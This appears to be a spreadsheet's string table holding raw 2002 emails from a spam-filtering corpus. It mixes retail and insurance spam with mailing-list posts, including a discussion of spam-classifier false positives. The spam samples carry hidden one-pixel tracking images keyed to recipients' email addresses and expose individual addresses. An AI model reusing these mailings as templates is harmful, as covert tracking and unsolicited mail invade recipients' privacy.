       &lt;TD background=http://www.terra.es/personal9/iop1008/images/mailer8_r2_c4.gif height=181&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD colSpan=4&gt;&lt;IMG height=24 src="http://www.terra.es/personal9/iop1008/images/mailer8_r3_c1.gif" 
         width=600 border=0 name=mailer8_r3_c1&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;TR&gt; 
       &lt;TD height="18"&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
       &lt;TD&gt;&lt;/TD&gt;
     &lt;/TR&gt;
     &lt;/TBODY&gt; 
   &lt;/TABLE&gt;
   &lt;MAP name=Map&gt;&lt;AREA shape=POLY 
     coords=244,119,270,129,280,114,297,125,318,113,327,129,355,120,352,133,385,131,381,140,398,145,398,152,405,151,397,160,383,165,409,172,381,180,404,193,384,195,382,207,384,212,364,210,351,213,353,224,327,216,317,230,297,219,278,232,269,218,243,225,238,210,211,210,209,202,199,193,216,180,186,172,216,164,192,151,195,143,211,136,211,132,231,135,243,130,243,121 
     href="http://www.terra.es/personal9/iop1005/"&gt;&lt;/MAP&gt;&lt;FONT 
   face=Verdana,Geneva,Arial,Helvetica,sans-serif color=#000000 size=1&gt;
   &lt;P&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p&gt;&lt;font size="1" face="Arial"&gt;We take your privacy very seriously and it is our policy never to send unwanted email messages.  This message has been sent to zzzz@spamassassin.taint.org because you originally joined one of our member sites or you signed up with a party that has contracted with atomicDOT.  Please &lt;a href="http://tilw.net/unsub.php?client=atomicDOT&amp;msgid=17090200005" TARGET="_blank"&gt;Click Here&lt;/a&gt;&lt;/font&gt; to Unsubscribe  &lt;font size="1" face="Arial"&gt;(replying to this email WILL NOT unsubscribe you).  &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;&gt;
 &lt;/body&gt;&lt;/html&gt;&lt;br&gt;&lt;br&gt;
 &lt;img src="http://tilw.net/counter.php?client=atomicDOT&amp;email=zzzz@spamassassin.taint.org&amp;msgid=17090200005" width="1" height="1" border="0" alt=""&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size="-5"&gt;TRCK:atomicDOT;mp*qhwqrwhlqf!frp;8;&lt;/font&gt;
 --------------103227703017104--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: My Brain Hurts
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Begin forwarded message:
 &gt; From: Ian Andrew Bell &lt;hello@ianbell.com&gt;
 &gt; Date: Tue Jul 23, 2002  02:02:20 PM US/Pacific
 &gt; To: foib@ianbell.com
 &gt; Subject: @F: [GENERAL] Evil Polling
 &gt;
 &gt; I know you're sitting there asking yourself, "who is the most evil 
 &gt; person on the planet?".  Wonder no more, your local search engine 
 &gt; will tell you.  Just search for the phrase +"&lt;person&gt; is EVIL" and 
 &gt; let the internet tell you the real truth.  I used two engines to 
 &gt; verify accuracy.
 &gt;
 &gt; Phrase: 							Google	Hotbot
 &gt; +"Bert is EVIL"						14700	5100
 &gt; +"Microsoft is EVIL"				1730	1600
 &gt; +"Saddam Hussein is EVIL"			98		100
 &gt; +"Ernie is EVIL"					75		69
 &gt; +"Osama Bin Laden is EVIL"			61		72
 &gt; +"Janet Reno is EVIL"				44		19
 &gt; +"George Bush is EVIL"				39		17
 &gt; +"Canada is EVIL"					19		82
 &gt; +"George W. Bush is EVIL"			22		21
 &gt; +"Tony Blair is EVIL"				11		12
 &gt; +"Adolf Hitler is EVIL"				1		23
 &gt; +"Dick Cheney is EVIL"				4		6
 &gt; +"Pat Buchanan is EVIL"				3		6
 &gt; +"Ghandi is EVIL"					2		5
 &gt; +"Bart Simpson is EVIL"				0		1
 &gt; +"Geoff Gachallan is EVIL"			0		0
 &gt;
 &gt;
 &gt; -Ian.
 &gt;
 &gt;
 &gt; -----------
 &gt; FoIB mailing list -- Bits, Analysis, Digital Group Therapy
 &gt; http://foib.ianbell.com/mailman/listinfo/foib
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Smurfs: The Pasta. Thank Goodness for Chef Boyardee
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8298180,1717/
 Date: 2002-09-27T03:46:29+01:00
 [IMG: http://www.newsisfree.com/Images/fark/xent.gif ([X-Entertainment])]
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; I also looked in more detail at some f-p's in my geeks traffic.  The
 &gt; &gt; first one's a doozie (that's the term, right? :-).  It has lots of
 &gt; &gt; HTML clues that are apparently ignored.
 &gt; 
 &gt; ?? The clues below are *loaded* with snippets unique to HTML (like '&lt;br&gt;').
 I *meant* to say that they were 0.99 clues cancelled out by 0.01
 clues.  But that's wrong too!  It looks I haven't grokked this part of
 your code yet; this one has way more than 16 clues, and it seems the
 classifier basically ended up counting way more 0.99 than 0.01 clues,
 and no others made it into the list.  I thought it was looking for
 clues with values in between; apparently it found none that weren't
 exactly 0.5?
 &gt; That sure sets the record for longest list of cancelling extreme clues!
 This happened to be the longest one, but there were quite a few
 similar ones.  I wonder if there's anything we can learn from looking
 at the clues and the HTML.  It was heavily marked-up HTML, with ads in
 the sidebar, but the body text was a serious discussion of "OO and
 soft coding" with lots of highly technical words as clues (including
 Zope and ZEO).
 &gt; That there are *any* 0.50 clues in here means the scheme ran out of
 &gt; anything interesting to look at.  Adding in more header lines should
 &gt; cure that.
 Are there any minable-but-unmined header lines in your corpus left?
 Or do we have to start with a different corpus before we can make
 progress there?
 &gt; &gt; The seventh was similar.
 &gt; &gt;
 &gt; &gt; I scanned a bunch more until I got bored, and most of them were either
 &gt; &gt; of the first form (brief text with URL followed by quoted HTML from
 &gt; &gt; website)
 &gt; 
 &gt; If those were text/plain, the HTML tags should have been stripped.  I'm
 &gt; still confused about this part.
 No, sorry.  These were all of the following structure:
   multipart/mixed
       text/plain        (brief text plus URL(s))
       text/html         (long HTML copied from website)
 I guess you get this when you click on "mail this page" in some
 browsers.
 &gt; That HTML tags aren't getting stripped remains the biggest mystery to me.
 Still?
 &gt; This seems confused: Jeremy didn't use my trained classifier pickle,
 &gt; he trained his own classifier from scratch on his own corpora.
 &gt; That's an entirely different kind of experiment from the one you're
 &gt; trying (indeed, you're the only one so far to report results from
 &gt; trying my pickle on their own email, and I never expected *that* to
 &gt; work well; it's a much bigger mystery to me why Jeremy got such
 &gt; relatively worse results from training his own -- and he's the only
 &gt; one so far to report results from *that* experiment).
 I think it's still corpus size.
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DVD capture: Unbreaking the Mac
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485727
 Date: Not supplied
 DVD Capture is an AppleScript for OS X that captures screen-grabs from DVDs. OS 
 X normally disables screen-capture while the DVD player is running (even if it 
 isn't visible!). I have some home movies on DVD that I'd love to get stills 
 from, but I can't -- the DVD licensing board has forced Apple to break my 
 hardware in such a way as to prevent me from doing something completely lawful, 
 to make sure that I never, ever grab a frame out of _Police Academy n - 1_. 
 Nice to see that independent software authors are willing to un-break my gear 
 for me. Link[1] Discuss[2] (_Thanks, Patrick[3]!_)
 [1] http://www.versiontracker.com/dyn/moreinfo/macosx/16324
 [2] http://www.quicktopic.com/boing/H/NmjEGYXDmqd
 [3] http://www.patandkat.com/pat/weblog/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Outer Where? Right here, at dELiAs*cOm!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 --_----------=_103005139443991
 Content-Disposition: inline
 Content-Length: 574
 Content-Transfer-Encoding: binary
 Content-Type: text/plain
 Dear dELiA*s Contests member,
 If you can see this, you have been subscribed to the
 mailing list as an HTML email user.  To switch to
 plain text mail, go to:
 http://lists.iturf.com/bcast/totext.epl?lid=127&amp;em=CARRIE@AXESS.COM
 You are subscribed as: CARRIE@AXESS.COM
 You signed up to receive updates on exclusive specials and happenings at dELiAs.cOm. We'd love to continue to bring you this news, however, if you wish to remove yourself from this mailing list, go to:
 http://www.delias.com/unsubscribe.epl?lid=127&amp;em=CARRIE@AXESS.COM&amp;jid=1251&amp;rid=4448995 
 --_----------=_103005139443991
 Content-Disposition: inline
 Content-Length: 4947
 Content-Transfer-Encoding: binary
 Content-Type: text/html
 &lt;img width='1' height='1' src="http://lists.iturf.com/bcast/open.gif?mid=1251&amp;rid=4448995" alt=" "&gt;
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;dELiAs.cOm&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR="#FFFFFF" MARGINBORDER="0" WIDTH=0 MARGINHEIGHT=0 TOPMARGIN=0 LEFTMARGIN=0&gt;
 &lt;TABLE BORDER=0 CELLPADDING=10 CELLSPACING=0 ALIGN="CENTER"&gt;
 &lt;TR&gt;
 	&lt;TD&gt;
 &lt;TABLE BORDER="0" WIDTH=704 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;TABLE BORDER="0" WIDTH=704 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD ROWSPAN=2&gt;
 			&lt;A HREF="http://www.delias.com/index.html?_QQ=100-21394"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/header.gif" BORDER="0" WIDTH=217 HEIGHT=44&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD COLSPAN=7&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/forward.gif" BORDER="0" WIDTH=487 HEIGHT=26&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/goto.gif" BORDER="0" WIDTH=44 HEIGHT=18&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.denim&amp;_QQ=100-21395"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/denim.gif" BORDER="0" WIDTH=57 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.pants&amp;_QQ=100-21396"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/pants.gif" BORDER="0" WIDTH=62 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.shoes&amp;_QQ=100-21397"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/shoes.gif" BORDER="0" WIDTH=56 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.tops&amp;_QQ=100-21398"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/tops.gif" BORDER="0" WIDTH=53 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/cat.epl?g=category.roomwares&amp;_QQ=100-21399"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/07_05_02/roomwares.gif" BORDER="0" WIDTH=81 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/closeouts/index.epl?_QQ=100-21400"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/06_28_02/discount.gif" BORDER="0" WIDTH=134 HEIGHT=18&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 			&lt;/TABLE&gt;
 		&lt;/TD&gt;	
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ALIGN="CENTER"&gt;
 			&lt;TABLE BORDER="0" WIDTH=700 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/coats.gif" BORDER="0" WIDTH=392 HEIGHT=106 BORDER=0 USEMAP="#coats_Map"&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/model.jpg" BORDER="0" WIDTH=308 HEIGHT=106&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10081&amp;_QQ=100-21401"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/peacoat.gif" BORDER="0" WIDTH=129 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10082&amp;_QQ=100-21402"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/madison.gif" BORDER="0" WIDTH=135 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10080&amp;_QQ=100-21403"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/caravan.gif" BORDER="0" WIDTH=128 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10081&amp;_QQ=100-21404"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/peacoat1.jpg" BORDER="0" WIDTH=308 HEIGHT=160&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;
 			&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/daisy.gif" BORDER="0" WIDTH=392 HEIGHT=112 BORDER=0 USEMAP="#daisy_Map"&gt;&lt;/TD&gt;
 		&lt;TD&gt;
 			&lt;A HREF="http://www.delias.com/item.epl?i=10081&amp;_QQ=100-21405"&gt;&lt;IMG SRC="http://lists.iturf.com/emails/images/08_22_02/peacoat2.jpg" BORDER="0" WIDTH=308 HEIGHT=112&gt;&lt;/A&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 	&lt;/TD&gt;
 &lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=11&gt;&lt;BR&gt;&lt;FONT SIZE="1" COLOR="#999999" FACE="ARIAL, HELVETICA, SANS-SERIF"&gt;You are subscribed as: CARRIE@AXESS.COM&lt;BR&gt;&lt;BR&gt;You signed up to receive updates on exclusive specials and happenings at dELiAs*cOm. We'd love to continue to bring you this news, however, if you wish to remove yourself from this mailing list, &lt;A HREF="http://www.delias.com/unsubscribe.epl?lid=127&amp;em=CARRIE@AXESS.COM&amp;jid=1251&amp;rid=4448995"&gt;&lt;FONT SIZE="1" COLOR="#999999"&gt;Click here&lt;/FONT&gt;&lt;/A&gt;. Please do not reply to this message.  If you have any questions, comments, or would like to send feedback to dELiA*s, please send an e-mail to: &lt;A HREF="mailto:help@delias.com"&gt;&lt;FONT SIZE="1" COLOR="#999999" FACE="ARIAL, HELVETICA, VERDANA"&gt;help@delias.com&lt;/FONT&gt;&lt;/A&gt;.&lt;/FONT&gt;
 		&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ALIGN="CENTER" COLSPAN=11&gt;&lt;BR&gt;&lt;FONT SIZE="1" COLOR="#999999" FACE="ARIAL, HELVETICA, VERDANA"&gt;&amp;#153; and &amp;#169; 2002 dELiA*s Corp.  All rights reserved.&lt;/FONT&gt;&lt;/TD&gt;
     &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/TD&gt;
     &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;MAP NAME="coats_Map"&gt;
 &lt;AREA SHAPE="rect" ALT="Shop Now" COORDS="0,88,92,106" HREF="http://www.delias.com/shop.html?_QQ=100-21406"&gt;
 &lt;/MAP&gt;
 &lt;MAP NAME="daisy_Map"&gt;
 &lt;AREA SHAPE="rect" ALT="Daisy Dollars" COORDS="208,67,335,92" HREF="http://www.delias.com/daisy.html?_QQ=100-21407"&gt;
 &lt;/MAP&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;!--L127:J1251:R4448995--&gt;
 --_----------=_103005139443991--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Z-app the Competition with Roster
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_18C3F1_01C2528F.A17426A0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  High velocity term underwriting has arrived
   High velocity term underwriting has arrived.
 =20
  ...with unbelieveable rates!
  Z-app The Competition! Z-app The Competition!=09
  	Eliminates all paperwork**	=20
  	Online pre-application process	=20
  	Cuts days out of the application process	=20
  	Avoids delays by ensuring that all information submitted is
 correct and complete =09
  	Eliminates the need for client visits and your need to obtain
 original client signatures	=20
  	Increases your clients' satisfaction with improved ease,
 accuracy and speed =09
  	Helps you deliver policies faster than the competition	=20
 Don't delay! Call or e-mail &lt;mailto:zapp@rosterfinancial.com&gt;  us today
 for more information!
  800-933-6632x6
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 Roster financial Services, LLC
 &lt;mailto:customerservice@rosterfinancial.com&gt;=20
 *Z-app is an on-line preliminary application available through the
 Zurich Life Companies and used in conjunction with Zurich's TeleLife=AE
 Process. **Replacement forms required in some states. Not for use with
 the general public. For agent use only.
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insuranceiq.com/optout
 &lt;http://www.Insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_18C3F1_01C2528F.A17426A0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Z-app the Competition with Roster&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#333333" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" border=3D"1" =
 bordercolor=3D"#000000"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-101a.jpg" =
 width=3D"550" height=3D"44" alt=3D"High velocity term underwriting has =
 arrived"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/roster/20020606-102a.jpg" =
 width=3D"320" height=3D"46"&gt;&lt;img =
 src=3D"http://iiq.us/images/roster/20020606-103a.jpg" width=3D"230" =
 height=3D"46" alt=3D"High velocity term underwriting has arrived."&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/roster/20020606-104a.jpg" =
 width=3D"550" height=3D"126"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/roster/20020606-105a.jpg" =
 width=3D"550" height=3D"70" alt=3D"...with unbelieveable rates!"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-401a.gif" =
 width=3D"239" height=3D"95" alt=3D'Z-app The Competition!'&gt;&lt;img =
 src=3D"http://iiq.us/images/roster/20020606-402a.gif" width=3D"301" =
 height=3D"95" alt=3D'Z-app The Competition!'&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"7%" valign=3D"baseline" =
 align=3D"right"&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-3.gif" =
 width=3D"15" height=3D"16"&gt;&lt;/td&gt;
                 &lt;td width=3D"93%"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Eliminates all =
 paperwork**&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"7%" valign=3D"baseline" =
 align=3D"right"&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-3.gif" =
 width=3D"15" height=3D"16"&gt;&lt;/td&gt;
                 &lt;td width=3D"93%"&gt;&lt;b&gt;&lt;font size=3D"2" color=3D"#000066" =
 face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;Online pre-application =
 process&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"7%" valign=3D"baseline" =
 align=3D"right"&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-3.gif" =
 width=3D"15" height=3D"16"&gt;&lt;/td&gt;
                 &lt;td width=3D"93%"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Cuts days out of the =
 application process&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"7%" valign=3D"baseline" =
 align=3D"right"&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-3.gif" =
 width=3D"15" height=3D"16"&gt;&lt;/td&gt;
                 &lt;td width=3D"93%"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Avoids=20
                   delays by ensuring that all information submitted is =
 correct and complete &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"7%" valign=3D"baseline" =
 align=3D"right"&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-3.gif" =
 width=3D"15" height=3D"16"&gt;&lt;/td&gt;
                 &lt;td width=3D"93%"&gt;&lt;b&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif" color=3D"#000066"&gt;Eliminates=20
                   the need for client visits and your need to obtain =
 original client signatures&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"7%" valign=3D"baseline" =
 align=3D"right"&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-3.gif" =
 width=3D"15" height=3D"16"&gt;&lt;/td&gt;
                 &lt;td width=3D"93%"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Increases=20
                   your clients' satisfaction with improved ease, =
 accuracy and speed &lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"7%" valign=3D"baseline" =
 align=3D"right"&gt;&lt;img src=3D"http://iiq.us/images/roster/20020606-3.gif" =
 width=3D"15" height=3D"16"&gt;&lt;/td&gt;
                 &lt;td width=3D"93%"&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Helps=20
                   you deliver policies faster than the =
 competition&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;
             Don't delay! Call or &lt;a =
 href=3D"mailto:zapp@rosterfinancial.com"&gt;e-mail&lt;/a&gt;=20
             us today for more information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/roster/20020423-3b.gif" =
 width=3D"527" height=3D"109" alt=3D'800-933-6632x6'&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;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 color=3D"#000000"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2" color=3D"#000000"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;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value=3D"zapp@rosterfinancial.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"Roster Financial Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;a href=3D"mailto:customerservice@rosterfinancial.com"&gt;&lt;img =
 src=3D"http://www.iiq.us/images/roster/20020423-5.gif" width=3D"339" =
 height=3D"81" alt=3D"Roster financial Services, LLC" =
 border=3D"0"&gt;&lt;/a&gt;&lt;br&gt;
             &lt;/b&gt;=20
             &lt;p align=3D"left"&gt;&lt;font size=3D"1"&gt;&lt;b&gt;*Z-app is an on-line =
 preliminary=20
               application available through the Zurich Life Companies =
 and used=20
               in conjunction with Zurich's TeleLife&amp;reg; Process. =
 **Replacement=20
               forms required in some states. Not for use with the =
 general public.=20
               For agent use only.&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/font&gt;&lt;/td&gt;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href=3D"http://www.Insuranceiq.com/optout/"&gt;=20
         http://www.Insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"1" color=3D"#9999ff"&gt;Legal =
 Notice&lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_18C3F1_01C2528F.A17426A0--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --o99acAvKqrTZeiCU
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Fri, Aug 23, 2002 at 04:17:55PM -0400, Sven Willenberger wrote:
 &gt; To see all the options compiled into (and version of) sendmail, try the
 &gt; following line:
 &gt;=20
 &gt; echo \$Z | /path/to/sendmail -bt -d0
 gives you the same information as "sendmail -d0.1 &lt; /dev/null", which
 doesn't include milter information.  (actually the -d0 part gives you the
 info, the $Z gives you sendmail version out of the test mode (-bt)... so
 it's slightly different, but not really.)
 --=20
 Randomly Generated Tagline:
 Be warned that typing \fBkillall \fIname\fP may not have the desired
  effect on non-Linux systems, especially when done by a privileged user.
  (From the killall manual page)
 --o99acAvKqrTZeiCU
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9ZppqAuOQUeWAs2MRAj5BAJ9xX0ndKBQQ8A6hbdoBDFSWMhasXACfXtzK
 pjl1dQioTsb92uk/0HUhGbo=
 =m9Tu
 -----END PGP SIGNATURE-----
 --o99acAvKqrTZeiCU--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</si>
  <si>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
 --- begin forwarded text
 Status: RO
 Date: Thu, 03 Oct 2002 03:21:05 +1000
 To: "John S. Denker" &lt;jsd@monmouth.com&gt;
 From: Greg Rose &lt;ggr@qualcomm.com&gt;
 Subject: Re: Optical analog computing?
